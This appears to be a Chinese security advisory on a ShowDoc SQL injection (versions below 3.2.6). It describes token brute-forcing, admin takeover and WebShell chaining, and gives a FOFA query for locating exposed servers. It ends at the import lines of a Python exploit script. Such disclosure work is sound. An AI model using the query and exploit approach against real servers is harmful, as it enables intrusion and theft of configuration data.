0x01 产品简介
ShowDoc 是一个开源的在线文档协作平台,它支持Markdown、图片等多种格式,方便团队成员共同编辑和分享文档。企业常见使用场景是使用其进行接口文档、内部知识库管理。
0x02 漏洞概述
2024年6月,ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可暴破用户token获取系统后台权限,建议所有使用该系统的企业尽快升级修复,以确保系统安全。
漏洞成因
该漏洞源于系统未使用有效的安全措施处理用户输入,并将用户的输入直接拼接进SQL语句中执行。这一过程导致了SQL注入漏洞的产生。
漏洞影响
该漏洞可利用SQL注入暴破用户token,进而使用管理员权限登录后台,从而获得接口文档、附件及LDAP等配置信息,还可结合反序列化漏洞,写入WebShell,从而获取服务器权限。
0x03 影响范围
version < 3.2.6
0x04 复现环境
FOFA:app="ShowDoc"
0x05 漏洞复现
Exp
import argparse
import ddddocr
import requests
import onnxruntime
from urllib.parse import urljoin
onnxruntime.set_default_logger_severity(3)
table
